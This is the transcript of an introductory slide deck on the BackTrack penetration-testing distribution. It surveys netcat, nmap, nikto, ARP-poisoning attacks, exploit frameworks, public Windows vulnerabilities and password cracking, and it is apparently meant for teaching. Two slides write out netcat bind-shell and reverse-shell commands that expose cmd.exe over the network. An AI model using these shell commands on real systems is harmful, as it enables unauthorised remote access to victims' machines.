Introduction to BackTrack - PowerPoint PPT Presentation

About This Presentation
Title:

Introduction to BackTrack

Description:

kun.seh_at_gmail.com back | track 3. Introduction: BackTrack is a suite of ... Consists of more than 300 different up-to-date tools which are logically ... – PowerPoint PPT presentation

Number of Views:18608
Avg rating:3.0/5.0
Slides: 26
Provided by: sehg
Category:

less

Transcript and Presenter's Notes

Title: Introduction to BackTrack


1
Introduction to BackTrack Local boot to remote
root in just one CD Thought for the day, Dont
learn to hack, hack to learn..!!! -
darknet.org.uk
Kunal Sehgal kun.seh_at_gmail.com
2
  • Introduction
  • BackTrack is a suite of penetration
    testing/vulnerability assessment tools installed
    on a Linux Operating System, all wrapped-up on a
    bootable (live) CD
  • The most top rated Linux live distribution
    focused on penetration testing
  • Consists of more than 300 different up-to-date
    tools which are logically structured according to
    the work flow of security professionals
  • Rated 1 Security-Distro by insecure.org
    sectools.org

3
  • Miscellaneous BT Services
  • HTTP (Port 80)
  • TFTP (Port 69)
  • SSH (Port 22)
  • VNC (Port 5901)

4
  • Netcat
  • A computer networking utility for reading from
    and writing to network connections on either TCP
    or UDP
  • Feature-rich network debugging and exploration
    tool, since it can create almost any kind of
    connection you would need, including port binding
    to accept incoming connections
  • Bind Shell
  • Reverse Shell

5
Bind Shell
Internet
Internet
NAT
Attacker (Private IP)
Victim (Public IP)
Attacker Connects to Victim (Incoming Traffic)
nc -lvp 4444 -e cmd.exe
nc -v ltIPgt 4444
6
Reverse Shell
Internet
Internet
NAT
Attacker (Public IP)
Victim (Private IP)
Victim sends the shell (Outgoing Traffic)
nc -v ltIPgt 4444 -e cmd.exe
nc -lvp 4444
7
  • Nmap
  • A security scanner used to discover computers and
    services on a computer network, thus creating a
    "map" of the network
  • Capable of discovering passive services on a
    network despite the fact that such services
    aren't advertising themselves
  • May be able to determine various details about
    the remote computers. These include operating
    system, device type, uptime, software product
    used to run a service, exact version number of
    that product, etc.

8
  • Nikto
  • A scanner which performs comprehensive tests
    against web servers for multiple items
  • Includes over 3500 potentially dangerous
    files/CGIs, versions on over 900 servers, and
    version specific problems on over 250 servers
  • Not every check is a security problem, though
    most are
  • There are some items that are "info only" type
    checks that look for items that may not have a
    security flaw, but the webmaster or security
    engineer may not know are present on the server

9
  • ARP Poisoning Man In The Middle Attack
  • MAC Address Hardware address or physical address
    is a quasi-unique identifier assigned to most
    network adapters or network interface cards
    (NICs) by the manufacturer for identification
  • Address Resolution Protocol (ARP) A method for
    finding a host's hardware address when only its
    Network Layer address is known
  • Ettercap A suite for man in the middle attacks
    on LAN. It features sniffing of live connections,
    content filtering on the fly and many other
    interesting tricks

10
Network Using A Hub
Receiver
Sender
Attacker
Can easily sniff data
11
Network Using A Switch
Receiver
Sender
Attacker
Cannot sniff any data (
12
Man In The Middle Attack
Receiver
Sender
Attacker
Hi everyone, Im the switch
13
  • Exploits
  • An exploit is a piece of software, a chunk of
    data, or sequence of commands that take advantage
    of a bug, glitch or vulnerability in order to
    cause unintended or unanticipated behavior to
    occur
  • Frequently includes such things as violently
    gaining control of a computer system or allowing
    privilege escalation or a denial of service
    attack
  • Zero Day Exploit A threat that tries to exploit
    unknown, undisclosed or patchfree computer
    application vulnerabilities
  • www.securityfocus.com www.milw0rm.com

14
  • Exploits (Conti)
  • Attack / Exploit

Vulnerability
Payload
  • App
  • Protocol
  • O/S
  • Add a user
  • Get a remote shell
  • GUI access
  • Change routing tables
  • Etc.. Etc..

15
  • Exploit Frameworks
  • A development platform for creating security
    tools and exploits
  • Used by network security professionals to perform
    penetration tests, system administrators to
    verify patch installations, product vendors to
    perform regression testing, and security
    researchers world-wide
  • A boon for script kiddies

16
  • Windows DCOM RPC Interface Buffer Overrun
  • Exploits a vulnerability in Windows OS
  • The issue is due to insufficient bounds checking
    of client DCOM object activation requests.
    Exploitation of this issue could result in
    execution of malicious instructions with Local
    System privileges on an affected system
  • www.securityfocus.com/bid/8205
  • Bind Shell

17
  • IE IsComponentInstalled Buffer Overflow
    Vulnerability
  • Exploits a vulnerability in an application (MS
    Internet Explorer)
  • Microsoft Internet Explorer is prone to a remote
    buffer-overflow vulnerability in the
    'IsComponentInstalled()' method. A successful
    exploit results in arbitrary code execution in
    the context of the user running the browser
  • www.securityfocus.com/bid/16870
  • Reverse Shell

18
  • MS Windows Graphics Rendering Engine WMF
  • Exploits a vulnerability in MS Windows WMF
    graphics rendering engine
  • The problem presents itself when a user views a
    malicious WMF formatted file, triggering the
    vulnerability when the engine attempts to parse
    the file
  • www.securityfocus.com/bid/16074

19
  • Passwords Hacking
  • Why hack local passwords?
  • Install softwares key loggers, trojans, etc
  • Gain access to another PC, Server, Router, etc.
  • People re-use passwords all the time
  • Types of attack
  • Brute force Attack
  • Dictionary Attack
  • Rainbow Tables

20
  • Password Attack Vectors
  • Online Attack Attacking network services that
    require a user to log on, by guessing the correct
    password
  • Offline Attack Attacking hash files that store
    encrypted passwords
  • Physical Access Attack Attacking machines and
    other network devices, after gaining physical
    access

21
  • How To Hack Windows Passwords?
  • Available Tools John The Ripper, Cain Abel,
    Rainbow Tables
  • Gain access to the victims PC

22
  • Google Hacking
  • Google hacking is a term that refers to the act
    of creating complex search engine queries in
    order to filter through large amounts of search
    results
  • In its malicious format it can be used to detect
    websites that are vulnerable to numerous exploits
    and vulnerabilities as well as locate private,
    sensitive information about others
  • http//johnny.ihackstuff.com

23
  • References
  • www.remote-exploit.org
  • www.offensive-security.com
  • www.wikipedia.org
  • www.metasploit.com
  • www.irongeek.com
  • www.cirt.net/nikto2
  • www.sourceforge.net
  • www.securityfocus.com
  • www.darknet.org.uk
  • johnny.ihackstuff.com
  • www.oxid.it/cain.html

24
  • Questions??
  • Feel free to contact me
  • Kunal Sehgal

25
  • Workshop Exercise
Write a Comment
User Comments (0)
About PowerShow.com